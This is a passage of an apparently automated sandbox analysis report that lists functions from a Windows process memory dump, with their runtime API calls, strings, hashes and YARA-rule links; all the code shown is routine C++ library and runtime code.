Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: Already open$Element not found$End of file$The descriptor does not fit into the select call's fd_set$asio.misc error
API String ID: 3519838083-1489422305
Opcode ID: 70c0e2452278dc936b64e8b947f716c18c0678518faf964aa817d85a2e9e5a4a
Instruction ID: cb9f38fdeb8afb4d419c4074bdfd119590e640fb98ae427e1c46fdaf524236c4
Opcode Fuzzy Hash: 70c0e2452278dc936b64e8b947f716c18c0678518faf964aa817d85a2e9e5a4a
Instruction Fuzzy Hash: 06F0A471B40118EA9B24DF55E9418EFB765FB54B20F10441BF915E3680CAB86DC18F8A

Uniqueness

Uniqueness Score: -1.00%

Function 0069B57D, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0069B572,00000003,?,0069B512,00000003,0077A770,0000000C,0069B625,00000003,00000002), ref: 0069B59D
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0069B572,00000003,?,0069B512,00000003,0077A770,0000000C,0069B625,00000003,00000002), ref: 0069B5B0
FreeLibrary.KERNEL32(00000000,?,?,?,0069B572,00000003,?,0069B512,00000003,0077A770,0000000C,0069B625,00000003,00000002,00000000), ref: 0069B5D3

Strings

CorExitProcess, xrefs: 0069B5A8
0A, xrefs: 0069B5C1
mscoree.dll, xrefs: 0069B596

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: 0A$CorExitProcess$mscoree.dll
API String ID: 4061214504-2877212468
Opcode ID: 1d8492c93ad1afce7cf1077919ba3eb13c5f2ef1e74f51257d4c64a4f288579a
Instruction ID: 8f9a08d19e7d12af9ac58180676ec6b36c3c64f505fd524b5156d0c0ac1629b2
Opcode Fuzzy Hash: 1d8492c93ad1afce7cf1077919ba3eb13c5f2ef1e74f51257d4c64a4f288579a
Instruction Fuzzy Hash: 32F04470901608BBCF115F94DC49BEDBFBAEF44751F414159F806A6690DB749A44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00425623, Relevance: 9.2, APIs: 6, Instructions: 235COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00425628
EnterCriticalSection.KERNEL32(?), ref: 0042563F
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 00425788
EnterCriticalSection.KERNEL32(?), ref: 004257ED
EnterCriticalSection.KERNEL32(?), ref: 0042581E
LeaveCriticalSection.KERNEL32(?), ref: 004258AC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$Enter$Leave$H_prolog
String ID:
API String ID: 3611688910-0
Opcode ID: c2e07bd3a5986b34029d637bda3c5bbbf0d7292fe6ffbc331e621f02b31f2def
Instruction ID: 056df3c0d2eb9cffcb813a6982c779101f017de6dde85cdf84c195aa0b9c8f57
Opcode Fuzzy Hash: c2e07bd3a5986b34029d637bda3c5bbbf0d7292fe6ffbc331e621f02b31f2def
Instruction Fuzzy Hash: D991DD71A01A15DFCB20DF68D484AAEB7F5FF88310F54451EE49AA7241CB38A905CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEAF, Relevance: 9.2, APIs: 6, Instructions: 154windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040FEB4
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 0040FEDB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040FF1B
LocalFree.KERNEL32(?,00000001,00000000), ref: 0040FFA9

Part of subcall function 0040FE60: __EH_prolog.LIBCMT ref: 0040FE65
Part of subcall function 0040FE60: ___swprintf_l.LIBCMT ref: 0040FE7F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ByteCharFormatFreeLocalMessageMultiWide___swprintf_l
String ID:
API String ID: 4070408034-0
Opcode ID: d2daa56d98e6193d82bb8e848b94981af98e2c4a7c51c55a96e873dd0f612190
Instruction ID: 6eb144c2b21ea5e784a10f5524bdd87e5babb78c7052902c75d6a2ec0aa1405d
Opcode Fuzzy Hash: d2daa56d98e6193d82bb8e848b94981af98e2c4a7c51c55a96e873dd0f612190
Instruction Fuzzy Hash: 20516F7091525EAEDF14DFA9DC44EAEBBB8FF05348F10403EF401A7681D7785A488B64

Uniqueness

Uniqueness Score: -1.00%

Function 004AB1AB, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 337COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AB1B0

Strings

GetType() == kNumberType, xrefs: 004AB20D
IsArray(), xrefs: 004AB370, 004AB392
IsObject(), xrefs: 004AB42E, 004AB44D
m->name.IsString(), xrefs: 004AB478

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: GetType() == kNumberType$IsArray()$IsObject()$m->name.IsString()
API String ID: 3519838083-2893571818
Opcode ID: d5918e2c8f9cecc33dec54a38af6190da608ed72b7f2acf2e5d654321892bab4
Instruction ID: 5c0636d0d6f2ca02896b5ae5941689dd9ff9a56bdd396e94014fae6496626045
Opcode Fuzzy Hash: d5918e2c8f9cecc33dec54a38af6190da608ed72b7f2acf2e5d654321892bab4
Instruction Fuzzy Hash: 15B12671600200ABEB04EF26C862B6A7B55EF27754F04801EF95A9F3C3DB6D9D41C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004AC6B2, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AC6B7
std::_Lockit::_Lockit.LIBCPMT ref: 004AC6C6

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 004AC6E6
__CxxThrowException@8.LIBVCRUNTIME ref: 004AC71D
std::_Facet_Register.LIBCPMT ref: 004AC733
std::_Lockit::~_Lockit.LIBCPMT ref: 004AC740

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 89190e13e06accde5150945d1e11c9d41fb98a49075b494e1a9af101bbbde1ee
Instruction ID: 1532d4a1789e685fc3c7f77ba125fff5febf6f56d28cffe721c44bbca1a5455c
Opcode Fuzzy Hash: 89190e13e06accde5150945d1e11c9d41fb98a49075b494e1a9af101bbbde1ee
Instruction Fuzzy Hash: 7511017290012A9BCF14EFA4E845AEE7775EF85360F10426FE415A72A1DB388E01CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 004AC757, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AC75C
std::_Lockit::_Lockit.LIBCPMT ref: 004AC76B

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 004AC78B
__CxxThrowException@8.LIBVCRUNTIME ref: 004AC7C2
std::_Facet_Register.LIBCPMT ref: 004AC7D8
std::_Lockit::~_Lockit.LIBCPMT ref: 004AC7E5

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: d07d0b3c9fbe607e3220d71249acf1fec392d6598a7d012e61c23a6b287e1eba
Instruction ID: ce3bb4b6a53e495045f9a2ce1b5e6d6481e57294df8fdb446926b189342b7ffb
Opcode Fuzzy Hash: d07d0b3c9fbe607e3220d71249acf1fec392d6598a7d012e61c23a6b287e1eba
Instruction Fuzzy Hash: B111BF3690011A9BCB15EFA4D846AEE7775EF81764F10421EE415A7291DF388A009B98

Uniqueness

Uniqueness Score: -1.00%

Function 004AC7FC, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AC801
std::_Lockit::_Lockit.LIBCPMT ref: 004AC810

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 004AC830
__CxxThrowException@8.LIBVCRUNTIME ref: 004AC867
std::_Facet_Register.LIBCPMT ref: 004AC87D
std::_Lockit::~_Lockit.LIBCPMT ref: 004AC88A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 7cd8b24ee667c606d7d42338ed3e2b892464f4a56b36c25aed6be94e69180333
Instruction ID: d1c26d0cb0ab5df327f75267a8669ebf3615149ef95b41f0c8e522a8c79f3724
Opcode Fuzzy Hash: 7cd8b24ee667c606d7d42338ed3e2b892464f4a56b36c25aed6be94e69180333
Instruction Fuzzy Hash: A611BF32D001199BCB54EFA8E845AEE7779FF81361F10461EF415A7291DB389A008795

Uniqueness

Uniqueness Score: -1.00%

Function 004AC8A1, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AC8A6
std::_Lockit::_Lockit.LIBCPMT ref: 004AC8B5

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 004AC8D5
__CxxThrowException@8.LIBVCRUNTIME ref: 004AC90C
std::_Facet_Register.LIBCPMT ref: 004AC922
std::_Lockit::~_Lockit.LIBCPMT ref: 004AC92F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 3bf81b2e001466a0163888c7d2f551760898cbc408f8647e9a6ead65252b41e4
Instruction ID: 3a246deeec6560509dfe69118ef7a71e5e127421341c2c0faae5af8dfca8f62d
Opcode Fuzzy Hash: 3bf81b2e001466a0163888c7d2f551760898cbc408f8647e9a6ead65252b41e4
Instruction Fuzzy Hash: DC110172D001199BCF10EFA4D805AEE7779EF91360F10421FF405A72A1DB388E01C795

Uniqueness

Uniqueness Score: -1.00%

Function 004AC946, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AC94B
std::_Lockit::_Lockit.LIBCPMT ref: 004AC95A

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 004AC97A
__CxxThrowException@8.LIBVCRUNTIME ref: 004AC9B1
std::_Facet_Register.LIBCPMT ref: 004AC9C7
std::_Lockit::~_Lockit.LIBCPMT ref: 004AC9D4

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: ccef139288c58c1e38b40e7e75f129d7b60e4b0357468f6dc928cf194e8664c7
Instruction ID: 13b770905170534efcdd766eb0edef51d4bac0a2d36b6c7b8ea54227a139e7d6
Opcode Fuzzy Hash: ccef139288c58c1e38b40e7e75f129d7b60e4b0357468f6dc928cf194e8664c7
Instruction Fuzzy Hash: 9111C172D001199BCF14EFA4D845AEFB779FF91364F10421EE419A72A1DB389E00C795

Uniqueness

Uniqueness Score: -1.00%

Function 004ACBF3, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004ACBF8
std::_Lockit::_Lockit.LIBCPMT ref: 004ACC07

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 004ACC27
__CxxThrowException@8.LIBVCRUNTIME ref: 004ACC5E
std::_Facet_Register.LIBCPMT ref: 004ACC74
std::_Lockit::~_Lockit.LIBCPMT ref: 004ACC81

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 76ee227040105744093c9b3b7673287735e031a5e1aa2b55f9e996ac841d8413
Instruction ID: 1901a9809ed08240bb05927a9ce30e5070394b7da30b446d29942a1a40cbc134
Opcode Fuzzy Hash: 76ee227040105744093c9b3b7673287735e031a5e1aa2b55f9e996ac841d8413
Instruction Fuzzy Hash: A911C1729001299BCF14EFA4D845AEEB775EF92760F10421FE819A73A1DF389A0187D4

Uniqueness

Uniqueness Score: -1.00%

Function 004AFA90, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AFA95
std::_Lockit::_Lockit.LIBCPMT ref: 004AFAA4

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 004AFAC4
__CxxThrowException@8.LIBVCRUNTIME ref: 004AFAFB
std::_Facet_Register.LIBCPMT ref: 004AFB11
std::_Lockit::~_Lockit.LIBCPMT ref: 004AFB1E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 609913055e4fb41048b5311b76043082ac84de1dee4dfde2bcf38f5f80e5439e
Instruction ID: c88a98ae2634358504f07075d77b647679fddab8161275b21ae3c7a1514a3058
Opcode Fuzzy Hash: 609913055e4fb41048b5311b76043082ac84de1dee4dfde2bcf38f5f80e5439e
Instruction Fuzzy Hash: C911C4319101199BCF14EFA4D815AEE7779EF81360F10426FE815A7291DF389E04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0057E261, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E268
std::_Lockit::_Lockit.LIBCPMT ref: 0057E272

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E292
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E2C9
std::_Facet_Register.LIBCPMT ref: 0057E2E8
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E2F1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 9d8340182993e6f047ec9e8f11ff102bd7a8566bf2e000b27a57fdba4ec79851
Instruction ID: dbfd3a82cd5e9d20875b6045803d6e5e35ad65ca5fc93e18d03c5fea84326778
Opcode Fuzzy Hash: 9d8340182993e6f047ec9e8f11ff102bd7a8566bf2e000b27a57fdba4ec79851
Instruction Fuzzy Hash: 4801A535D4011A9BCF01FF60E81AABD7B7ABF84750F54811EF504AB292DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E2FE, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E305
std::_Lockit::_Lockit.LIBCPMT ref: 0057E30F

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E32F
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E366
std::_Facet_Register.LIBCPMT ref: 0057E385
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E38E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 55237f8a92e48a2295124083fcea6425645dad6936cc586ef334fc6e9cfcbc52
Instruction ID: 8533c6be2ba005a4bdbe5797f51fe58321be3fb6113c76b80d5be885b3fee7ce
Opcode Fuzzy Hash: 55237f8a92e48a2295124083fcea6425645dad6936cc586ef334fc6e9cfcbc52
Instruction Fuzzy Hash: F001A135E0021A9BCF01FB60E81AABD7B76BF84350F58895EF5046B291DF38AD029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E39B, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E3A2
std::_Lockit::_Lockit.LIBCPMT ref: 0057E3AC

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E3CC
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E403
std::_Facet_Register.LIBCPMT ref: 0057E422
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E42B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: e4f0fe9fb8ecd28c0d3997a4955ee221b29e19dbd318a40886a0bae1035efec0
Instruction ID: fc6c4611423ad42d711d735bef486b1a97072a3d2672336a709902c6474b40a5
Opcode Fuzzy Hash: e4f0fe9fb8ecd28c0d3997a4955ee221b29e19dbd318a40886a0bae1035efec0
Instruction Fuzzy Hash: F301C832D4011A9BCF01FB60D856AFD777ABF98310F54851EE5056B291DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E438, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E43F
std::_Lockit::_Lockit.LIBCPMT ref: 0057E449

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E469
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E4A0
std::_Facet_Register.LIBCPMT ref: 0057E4BF
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E4C8

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: e636745b331758bc8370207ceab7e6424de81536e35c5bb9d3af6d84e9bb3bd0
Instruction ID: f08e75661220e87bdb62a560cc8e01868e38f36ea93170f9891ffa1b46fcdf07
Opcode Fuzzy Hash: e636745b331758bc8370207ceab7e6424de81536e35c5bb9d3af6d84e9bb3bd0
Instruction Fuzzy Hash: 42018231D0021A9BCF01FB60D806ABD7B66BF94360F54815EE5086B2A1DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E749, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E750
std::_Lockit::_Lockit.LIBCPMT ref: 0057E75A

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E77A
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E7B1
std::_Facet_Register.LIBCPMT ref: 0057E7D0
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E7D9

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 65994e3ad9f6de19701ce347dae83b651c4c042e6dc766c544dab5a80f4730bd
Instruction ID: 558249e0b5faf95efc73031d4c2cbb1b514d082d733793137f8f707643f790a7
Opcode Fuzzy Hash: 65994e3ad9f6de19701ce347dae83b651c4c042e6dc766c544dab5a80f4730bd
Instruction Fuzzy Hash: C801E131E0012A9BCF15FBA0D84AABD7B36BF84360F54811EE5186B291DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E7E6, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E7ED
std::_Lockit::_Lockit.LIBCPMT ref: 0057E7F7

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E817
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E84E
std::_Facet_Register.LIBCPMT ref: 0057E86D
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E876

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: a585bae7a1e9e8186d6e4b8642b6e7882746a9da09f163442eb8356833afd783
Instruction ID: bd4947e7f6702c05411a057a98c165b2866aa9d59eebb32bdac75f5d3c1f4262
Opcode Fuzzy Hash: a585bae7a1e9e8186d6e4b8642b6e7882746a9da09f163442eb8356833afd783
Instruction Fuzzy Hash: 7601C435E0021A9BCF01FBA0E81AABD7B7ABF84360F54811EF5147B291DF389D029795

Uniqueness

Uniqueness Score: -1.00%

Function 0057E883, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E88A
std::_Lockit::_Lockit.LIBCPMT ref: 0057E894

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E8B4
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E8EB
std::_Facet_Register.LIBCPMT ref: 0057E90A
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E913

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: cf3be82da596dc770bd3c269b100ccbf5e8e2a9891da9d54f6d0e2b643dc2abc
Instruction ID: 0605de5de5d7d0682c1eff9b3640b42e69ac869223a1b5a31eb20d074bd4b37e
Opcode Fuzzy Hash: cf3be82da596dc770bd3c269b100ccbf5e8e2a9891da9d54f6d0e2b643dc2abc
Instruction Fuzzy Hash: 0901E532D0021A9BCF05FF60DC06AAD7B36BF84360F54451EE5086B291DF389D02D794

Uniqueness

Uniqueness Score: -1.00%

Function 0057E920, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057E927
std::_Lockit::_Lockit.LIBCPMT ref: 0057E931

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057E951
__CxxThrowException@8.LIBVCRUNTIME ref: 0057E988
std::_Facet_Register.LIBCPMT ref: 0057E9A7
std::_Lockit::~_Lockit.LIBCPMT ref: 0057E9B0

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 9bdc31c66a758178ee814f213b6da3cc64e7f945ba1c8930040188246cc90194
Instruction ID: 0a07c6b17e7d99e8f9c045659a922505dddf0ec7e2ce40df1b09c5216d064eb5
Opcode Fuzzy Hash: 9bdc31c66a758178ee814f213b6da3cc64e7f945ba1c8930040188246cc90194
Instruction Fuzzy Hash: C801A532D0021A9BCF01FFA0D846ABD7776BF84750F54811EE5156B2A1DF389D02D795

Uniqueness

Uniqueness Score: -1.00%

Function 0057EAF7, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057EAFE
std::_Lockit::_Lockit.LIBCPMT ref: 0057EB08

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057EB28
__CxxThrowException@8.LIBVCRUNTIME ref: 0057EB5F
std::_Facet_Register.LIBCPMT ref: 0057EB7E
std::_Lockit::~_Lockit.LIBCPMT ref: 0057EB87

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 847e421ec24a57a0f0d35f89b2db2d03641eef59b8c85f37fa2294798e0b5140
Instruction ID: ade1e44851079c12a18bd5dc2cec5c4a732975b2565027a8ce5a58b3585d77bb
Opcode Fuzzy Hash: 847e421ec24a57a0f0d35f89b2db2d03641eef59b8c85f37fa2294798e0b5140
Instruction Fuzzy Hash: 2E01E135E0021A9BCF01FB60D846AAD7B76BF84360F54810EE5096B2A1DF389D029795

Uniqueness

Uniqueness Score: -1.00%

Function 0057EB94, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057EB9B
std::_Lockit::_Lockit.LIBCPMT ref: 0057EBA5

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
